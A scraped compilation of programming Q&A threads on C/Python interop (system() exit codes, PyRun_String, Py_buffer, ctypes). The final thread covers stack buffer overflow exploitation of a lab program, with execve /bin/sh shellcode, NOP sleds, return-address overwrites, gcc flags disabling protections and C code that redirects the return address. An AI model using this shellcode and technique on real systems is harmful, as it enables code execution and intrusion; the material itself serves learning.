c system() return from python script - confusing! - python

I need to call through to a python script from C and be able to catch return values from it. it doesn't particularly matter what the values are, they may as well be an enum, but the values I got out of a test case confused me, and I wanted to get to the bottom of what I was seeing.
So, here is the C:
#include <stdlib.h>
#include <stdio.h>
int main(void)
{
int out = 0;
out = system("python /1.py");
printf("script 1 returned %d\n", out);
return 0;
}
and here is /1.py :
import sys
sys.exit(1)
The output of these programs is this:
script 1 returned 256
some other values:
2 -> 512
800 -> 8192
8073784 -> 14336
Assuming that it is...reading in little rather than big endian, or something? how can I write a c function (or trick python in)to correctly returning and interpret the numbers?

From the Linux documentation on system():
... return status is in the format specified in wait(2). Thus, the exit code of the command will be WEXITSTATUS(status) ...
From following the link on wait, we get the following:
WEXITSTATUS(status): returns the exit status of the child. ... This macro should only be employed if WIFEXITED returned true.
What this amounts to is that you can't use the return value of system() directly, but must use macros to manipulate them. And, since this is conforming to the C standard and not just the Linux implementation, you will need to use the same procedure for any operating environment that you are using.

The system() call return value is in the format specified by waitpid(). The termination status is not as defined for the sh utility. I can't recall but it works something like:
int exit_value, signal_num, dumped_core;
...
exit_value = out >> 8;
signal_num = out & 127;
dumped_core = out & 128;

Related

Getting result of PyRun_String when python code returns an object

i have a problem with my code.
i have a python file for the capturing of mavlink messages(i'm using pymavlink library) and i need to create a library for interfacing python results with c/c++ code.
this is my python code from .py file
from pymavlink import mavutil
the_connection = mavutil.mavlink_connection('udpin:localhost:14550')
the_connection.wait_heartbeat()
print("Heartbeat from system (system %u component %u)" % (the_connection.target_system, the_connection.target_component))
while 1:
attitude=the_connection.messages['ATTITUDE']
print("attitude: ",attitude)
i need to recover the attitude object as PyObject, the result of the last print is:
attitude: ATTITUDE {time_boot_ms : 1351674, roll : -0.006938610225915909, pitch : -0.009435104206204414, yaw : 1.8100472688674927, rollspeed : 0.0005244240164756775, pitchspeed : -0.0023000920191407204, yawspeed : 0.0002169199287891388}
i have a streaming of messages, so i need to call the connection and the to evaluate the result in a loop. so i tried to call the simple python commands as string, to open the connection and then access to the data. My C code is:
Py_Initialize();
PyRun_SimpleString("from pymavlink import mavutil\n"
"the_connection = mavutil.mavlink_connection('udpin:localhost:14550')\n"
"the_connection.wait_heartbeat()\n"
"print(\"Heartbeat from system (system %u component %u)\" % (the_connection.target_system, the_connection.target_component), flush=True)" );
PyObject* main_module=PyImport_AddModule("__main__");
PyObject* pdict = PyModule_GetDict(main_module);
PyObject* pdict_new = PyDict_New();
while (1) {
PyObject* pval = PyRun_String("the_connection.messages['ATTITUDE']", Py_single_input, pdict, pdict_new);
PyObject* repr = PyObject_Str(pval);
PyObject* str = PyUnicode_AsEncodedString(repr, "utf-8", "~E~");
const char* bytes = PyBytes_AS_STRING(str);
PyObject_Print(pval, stdout, 0);
printf(" end\n");
Py_XDECREF(repr);
}
Py_Finalize();
the result of this code is:
<pymavlink.dialects.v20.ardupilotmega.MAVLink_attitude_message object at 0x7fba218220>
None end
<pymavlink.dialects.v20.ardupilotmega.MAVLink_attitude_message object at 0x7fba218220>
None end
<pymavlink.dialects.v20.ardupilotmega.MAVLink_attitude_message object at 0x7fba218220>
None end
<pymavlink.dialects.v20.ardupilotmega.MAVLink_attitude_message object at 0x7fba218220>
None end
i've tried using a return of the object, but it didn't work
PyObject* pval = PyRun_String("return(the_connection.messages['ATTITUDE'])", Py_single_input, pdict, pdict_new);
i'm not expert of C/C++, is there a way to obtain the result in the right way?i'm not interested in a string format, i only need a way to use the result as c object
i'm using python 3.9, on a raspberry pi, gcc version is 10.2.1.
thank you
You want
PyRun_String("the_connection.messages['ATTITUDE']", Py_eval_input, pdict, pdict_new);
Py_eval_input treats it like the Python builtin eval (so what you're running must be an expression rather than a statement, which it is...).
In contrast, Py_single_input evaluates a single statement, but just returns None because a statement doesn't necessary returns anything. (In Python all expressions are statements, but not all statements are expressions). It's more akin to exec (but only deals with a single line).
Using "return(the_connection.messages['ATTITUDE'])" doesn't work because return is specifically designed to appear in a Python function.

why python compiler doesn't ignore syntax errors after exit()?

I have a question about the python compiler.
I was running the below code but I got some errors that weren't logical.
if you run a python code and then add the exit() function to it, it would exit the program and the following codes wouldn't run. but I added the exit() function to my program and after the exit() function I had some syntax error and the program crashed because of the syntax error, I want to know why the python compiler didn't optimize my code before running it. I tried this issue with logical errors and it ignored the errors, like out of range index error and so on. so why the below code doesn't work and syntax error happens?
simple code:
print("Hi")
exit()
if
as you can see we run
It can't compile your program precisely because it's a compiler (to bytecode which it will later interpret). It doesn't stop parsing when it sees an exit(), unlike a shell reading and interpreting a shell script one line at a time. (That's not "optimization", BTW).
Python compiles it to bytecode that calls exit if that point in the program is reached. Even unreachable code has to be syntactically valid so the whole file compiles. But since it never actually executes, it can't cause any run-time errors.
It's not an arbitrary process. C compiler works smarter how does the C compiler can detect it?
For example, if you run a while 1 program with C it doesn't run because of logic. but why do python doesn't do the same thing?
That's not true.
C compilers choke on syntax errors in unreachable blocks, like int foo(){ if(0) if if; }. Also, while 1 isn't valid C syntax.
https://godbolt.org/z/cP83Y866b. Only #if 0 preprocessor stuff, or comments, can hide stuff from the compiler so it doesn't have to be valid syntax and grammar.
Syntax and grammar need to be valid in the whole file for it to parse into something to compiler can compile.
In C and C++, unreachable code (that isn't commented out) even has to be valid in terms of types matching, e.g. T x = y; won't compile if T is int but y's type is char*. That would be syntactically valid but "ill-formed". Per cppreference: Outside a template, a discarded statement is fully checked. if constexpr is not a substitute for the #if preprocessing directive
But inside a template, it can, for example hide stuff. https://godbolt.org/z/frTcbMb3T
template <typename T> // being a template function makes if constexpr special
void foo(int x) {
if constexpr (false) {
int x = "hi"; // ill-formed, type mismatch. But still valid *syntax*
}
#if 1 // 0 would truly ignore all text until the closing #endif
if constexpr (false) {
// int x = = 2; // syntax error if uncommented
}
#endif
}

Getting a SIGSEGV when calling python3 extension module function operating a Py_buffer

I'm toying around with Python C extension modules and I've got this simple function:
static PyObject *e_parse_metadata(PyObject *self, PyObject *args) {
Py_buffer buf;
if(!PyArg_ParseTuple(args, "y#", &buf)) {
// interpreter raises exception, we return NULL to indicate failure
return NULL;
}
fprintf(stdout, "extension: %c%c\n\n", *((char *) buf.buf) + 0, *((char*) buf.buf + 1)); // should print "BM"
PyBuffer_Release(&buf);
return PyLong_FromLong(33l);
}
It attempts to obtain a Py_buffer from an argument passed to it from within Python. It then displays the first 2 bytes from the buffer as characters to stdout, releases the buffer, and returns a reference to a new PyObject representing the integer 33.
Next I've got this Python example utilizing said function:
#!/usr/bin/env python3
import bbmp_utils # my module
with open('./mit.bmp', 'rb') as mit:
if(mit.readable()):
filedata = mit.read()
res = bbmp_utils.parse_metadata(filedata) # call to my function in the extension module
print(res, type(res))
This results in the extension module successfully printing the first 2 bytes from the byte stream (extension: BM) to stdout, but it then terminates: fish: “env PYTHONPATH=./build_dbg pyth…” terminated by signal SIGSEGV (Address boundary error)
Strangely enough directly passing the bytes instance to my extension function doesn't cause a crash at all, e.g.
res = bbmp_utils.parse_metadata(mit.read())
Why does the first example result in a crash and the second one doesn't?
I was using the wrong format specifier when parsing Python arguments.
y# requires that the length of the buffer be passed to PyArg_ParseTuple as well, which I hadn't done. Also note that the # variant assumes a read-only buffer.
y* works as expected.
This is fine but it still doesn't explain why one of the python versions crashes and the other doesn't.

call c++ function from python

I meet a question,this dll java or php can call successful,but when I use python call get access violation error,
I want to know is c++ char* is error to ctypes c_char_p, how can I use python ctypes map c++ char*
c++ dll define
#define Health_API extern "C" __declspec(dllexport)
Health_API unsigned long Initialization(int m_type,char * m_ip,int m_port)
Health_API int GetRecordCount(unsigned long m_handle)
python code
from ctypes import *
lib = cdll.LoadLibrary(r"./Health.dll")
inita = lib.Initialization
inita.argtype = (c_int, c_char_p, c_int)
inita.restype = c_ulong
getcount = lib.GetRecordCount
getcount.argtype = c_ulong
getcount.retype = c_int
# here call
handle = inita(5, '127.0.0.1'.encode(), 4000)
print(handle)
result = getcount(handle)
error info:
2675930080
Traceback (most recent call last):
File "C:/Users/JayTam/PycharmProjects/DecoratorDemo/demo.py", line 14, in <module>
print(getcount(handle))
OSError: exception: access violation reading 0x000000009F7F73E0
After modification
I find if not define restype=long , it will return negative number,this is a noteworthy problem,but I change the restype=u_int64,it cann't connect as well.
It is delightful that my shcoolmate use her computer(win7 x64) call the same dll success,use simple code as follow
from ctypes import *
lib = cdll.LoadLibrary("./Health.dll")
handle = lib.Initialization(5, '127.0.0.1'.encode(), 4000)
lib.GetRecordList(handle, '')
I am win10 x64,my python environment is annaconda,and I change the same environment as her,use the same code,still return the same error
python vs java
Although I konw it shuould be the environment cause,I really want to konw What exactly caused it?
python
each run handle is Irregular number,my classmate's pc get regular number
such as :288584672,199521248,1777824736,-607161376(I dont set restype)
this is using python call dll,cann't connect port 4000
java
also get regular number without negative number
such as :9462886128,9454193200,9458325520,9451683632
this's java call dll
so I think should be this code casue error,but in other pc no problem,it's amazing
handle = lib.Initialization(5, '127.0.0.1'.encode(), 4000)
c++ dll:
Health_API unsigned long Initialization(int m_type,char* m_ip,int m_port)
{
CHandleNode* node;
switch(m_type)
{
case BASEINFO:
{
CBaseInfo* baseInfo = new CBaseInfo;
baseInfo->InitModule(m_ip,m_port);
node = m_info.AddMCUNode((unsigned long)baseInfo);
node->SetType(m_type);
return (unsigned long)baseInfo;
}
break;
case BASEINFO_ALLERGENS:
{
CBaseInfo_Allergens* baseInfo_Allergens = new CBaseInfo_Allergens;
baseInfo_Allergens->InitModule(m_ip,m_port);
node = m_info.AddMCUNode((unsigned long)baseInfo_Allergens);
node->SetType(m_type);
return (unsigned long)baseInfo_Allergens;
}
break;
. (case too many, ... represent them)
.
.
}
return -1;
}
Health_API int GetRecordList(unsigned long m_handle,char* m_index)
{
CHandleNode* node = m_info.GetMCUNode(m_handle);
if( node == NULL)
{
return -1;
}
switch(node->GetType())
{
case BASEINFO:
{
CBaseInfo* baseInfo = (CBaseInfo*)m_handle;
return baseInfo->GetRecordList(m_index);
}
break;
case BASEINFO_ALLERGENS:
{
CBaseInfo_Allergens* baseInfo_Allergens = (CBaseInfo_Allergens *)m_handle;
return baseInfo_Allergens->GetRecordList(m_index);
}
break;
. (case too many, ... represent them)
.
.
}
return -1;
}
It may help to have the source code of the C++, but I can take some guesses
I don't think this is related, but:
getcount.retype is missing an s, it should be restype.
And I always define argtype as an array instead of a tuple, and if there is only one argument I still use an array of one element.
If the char* is a null terminated string, you need indeed to use c_char_p. And in this case it is highly recommended to add a const to the m_ip argument.
If the char* is a pointer to a raw buffer (filled or not by the calling function), which is not the case here, you need to use POINTER(c_char) and not c_char_p
Base on the error message, your handle is a pointer, you should use for that the right type in your C++ code: void*. And in your python you should use c_void_p
Is it 64 bits code ? What toolchain/compiler was used to build the DLL ? What is the size of unsigned long in this toolchain ?
Edit: Here the reason of your problem: Is Python's ctypes.c_long 64 bit on 64 bit systems?
handle is a pointer in your DLL, and was certainly built using a compiler where a long is 64 bits, but for python 64 bits on Windows a long is 32 bits, which cannot store your pointer. Your really should use a void*
First you could try to use c_void_p in your python for the handle without modifying your source code, it may works depending of the compiler used. But since the size of the long type is not defined by any standard, and may not be able to store a pointer, you really should use in your C++ code void* or uintptr_t
Edit2: If you are using visual studio, and not GCC, the size of a long is only 32 bits (Size of long vs int on x64 platform)
So you must fix the code of the DLL

Why is my stack buffer overflow exploit not working?

So I have a really simple stackoverflow:
#include <stdio.h>
int main(int argc, char *argv[]) {
char buf[256];
memcpy(buf, argv[1],strlen(argv[1]));
printf(buf);
}
I'm trying to overflow with this code:
$(python -c "print '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' + 'A'*237 + 'c8f4ffbf'.decode('hex')")
When I overflow the stack, I successfully overwrite EIP with my wanted address but then nothing happens. It doesn't execute my shellcode.
Does anyone see the problem? Note: My python may be wrong.
UPDATE
What I don't understand is why my code is not executing. For instance if I point eip to nops, the nops never get executed. Like so,
$(python -c "print '\x90'*50 + 'A'*210 + '\xc8\xf4\xff\xbf'")
UPDATE
Could someone be kind enough to exploit this overflow yourself on linux
x86 and post the results?
UPDATE
Nevermind ya'll, I got it working. Thanks for all your help.
UPDATE
Well, I thought I did. I did get a shell, but now I'm trying again and I'm having problems.
All Im doing is overflowing the stack at the beginning and pointing my shellcode there.
Like so,
r $(python -c 'print "A"*260 + "\xcc\xf5\xff\xbf"')
This should point to the A's. Now what I dont understand is why my address at the end gets changed in gdb.
This is what gdb gives me,
Program received signal SIGTRAP, Trace/breakpoint trap.
0xbffff5cd in ?? ()
The \xcc gets changed to \xcd. Could this have something to do with the error I get with gdb?
When I fill that address with "B"'s for instance it resolves fine with \x42\x42\x42\x42. So what gives?
Any help would be appreciated.
Also, I'm compiling with the following options:
gcc -fno-stack-protector -z execstack -mpreferred-stack-boundary=2 -o so so.c
It's really odd because any other address works except the one I need.
UPDATE
I can successfully spawn a shell with the following in gdb,
$(python -c "print '\x90'*37 +'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' + 'A'*200 + '\xc8\xf4\xff\xbf'")
But I don't understand why this works sometimes and doesn't work other times. Sometimes my overwritten eip is changed by gdb. Does anyone know what I am missing? Also, I can only spwan a shell in gdb and not in the normal process. And on top of that, I can only seem to start a shell once in gdb and then gdb stops working.
For instance, now when I run the following I get this in gdb...
Starting program: /root/so $(python -c 'print "A"*260 + "\xc8\xf4\xff\xbf"')
Program received signal SIGSEGV, Segmentation fault.
0xbffff5cc in ?? ()
This seems to be caused by execstack be turned on.
UPDATE
Yeah, for some reason I'm getting different results but the exploit is working now. So thank you everyone for your help. If anyone can explain the results I received above, I'm all ears. Thanks.
There are several protections, for the attack straight from the
compiler. For example your stack may not be executable.
readelf -l <filename>
if your output contains something like this:
GNU_STACK 0x000000 0x00000000 0x00000000 0x00000 0x00000 RW 0x4
this means that you can only read and write on the stack ( so you should "return to libc" to spawn your shell).
Also there could be a canary protection, meaning there is a part of the memory between your variables and the instruction pointer that contains a phrase that is checked for integrity and if it is overwritten by your string the program will exit.
if your are trying this on your own program consider removing some of the protections with gcc commands:
gcc -z execstack
Also a note on your assembly, you usually include nops before your shell code, so you don't have to target the exact address that your shell code is starting.
$(python -c "print '\x90'*37 +'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' + 'A'*200 + '\xc8\xf4\xff\xbf'")
Note that in the address that should be placed inside the instruction pointer
you can modify the last hex digits to point somewhere inside your nops and not
necessarily at the beginning of your buffer.
Of course gdb should become your best friend if you are trying something
like that.
Hope this helps.
This isn't going to work too well [as written]. However, it is possible, so read on ...
It helps to know what the actual stack layout is when the main function is called. It's a bit more complicated than most people realize.
Assuming a POSIX OS (e.g. linux), the kernel will set the stack pointer at a fixed address.
The kernel does the following:
It calculates how much space is needed for the environment variable strings (i.e. strlen("HOME=/home/me") + 1 for all environment variables and "pushes" these strings onto the stack in a downward [towards lower memory] direction. It then calculates how many there were (e.g. envcount) and creates an char *envp[envcount + 1] on the stack and fills in the envp values with pointers to the given strings. It null terminates this envp
A similar process is done for the argv strings.
Then, the kernel loads the ELF interpreter. The kernel starts the process with the starting address of the ELF interpreter. The ELF interpreter [eventually] invokes the "start" function (e.g. _start from crt0.o) which does some init and then calls main(argc,argv,envp)
This is [sort of] what the stack looks like when main gets called:
"HOME=/home/me"
"LOGNAME=me"
"SHELL=/bin/sh"
// alignment pad ...
char *envp[4] = {
// address of "HOME" string
// address of "LOGNAME" string
// address of "SHELL" string
NULL
};
// string for argv[0] ...
// string for argv[1] ...
// ...
char *argv[] = {
// pointer to argument string 0
// pointer to argument string 1
// pointer to argument string 2
NULL
}
// possibly more stuff put in by ELF interpreter ...
// possibly more stuff put in by _start function ...
On an x86, the argc, argv, and envp pointer values are put into the first three argument registers of the x86 ABI.
Here's the problem [problems, plural, actually] ...
By the time all this is done, you have little to no idea what the address of the shell code is. So, any code you write must be RIP-relative addressing and [probably] built with -fPIC.
And, the resultant code can't have a zero byte in the middle because this is being conveyed [by the kernel] as an EOS terminated string. So, a string that has a zero (e.g. <byte0>,<byte1>,<byte2>,0x00,<byte5>,<byte6>,...) would only transfer the first three bytes and not the entire shell code program.
Nor do you have a good idea as to what the stack pointer value is.
Also, you need to find the memory word on the stack that has the return address in it (i.e. this is what the start function's call main asm instruction pushes).
This word containing the return address must be set to the address of the shell code. But, it doesn't always have a fixed offset relative to a main stack frame variable (e.g. buf). So, you can't predict what word on the stack to modify to get the "return to shellcode" effect.
Also, on x86 architectures, there is special mitigation hardware. For example, a page can be marked NX [no execute]. This is usually done for certain segments, such as the stack. If the RIP is changed to point to the stack, the hardware will fault out.
Here's the [easy] solution ...
gcc has some intrinsic functions that can help: __builtin_return_address, __builtin_frame_address.
So, get the value of the real return address from the intrinsic [call this retadr]. Get the address of the stack frame [call this fp].
Starting from fp and incrementing (by sizeof(void*)) toward higher memory, find a word that matches retadr. This memory location is the one you want to modify to point to the shell code. It will probably be at offset 0 or 8
So, then do: *fp = argv[1] and return.
Note, extra steps may be necessary because if the stack has the NX bit set, the string pointed to by argv[1] is on the stack as mentioned above.
Here is some example code that works:
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <sys/syscall.h>
void
shellcode(void)
{
static char buf[] = "shellcode: hello\n";
char *cp;
for (cp = buf; *cp != 0; ++cp);
// NOTE: in real shell code, we couldn't rely on using this function, so
// these would need to be the CPP macro versions: _syscall3 and _syscall2
// respectively or the syscall function would need to be _statically_
// linked in
syscall(SYS_write,1,buf,cp - buf);
syscall(SYS_exit,0);
}
int
main(int argc,char **argv)
{
void *retadr = __builtin_return_address(0);
void **fp = __builtin_frame_address(0);
int iter;
printf("retadr=%p\n",retadr);
printf("fp=%p\n",fp);
// NOTE: for your example, replace:
// *fp = (void *) shellcode;
// with:
// *fp = (void *) argv[1]
for (iter = 20; iter > 0; --iter, fp += 1) {
printf("fp=%p %p\n",fp,*fp);
if (*fp == retadr) {
*fp = (void *) shellcode;
break;
}
}
if (iter <= 0)
printf("main: no match\n");
return 0;
}
I was having similar problems when trying to perform a stack buffer overflow. I found that my return address in GDB was different than that in a normal process. What I did was add the following:
unsigned long printesp(void){
__asm__("movl %esp,%eax");
}
And called it at the end of main right before Return to get an idea where the stack was. From there I just played with that value subtracting 4 from the printed ESP until it worked.

Categories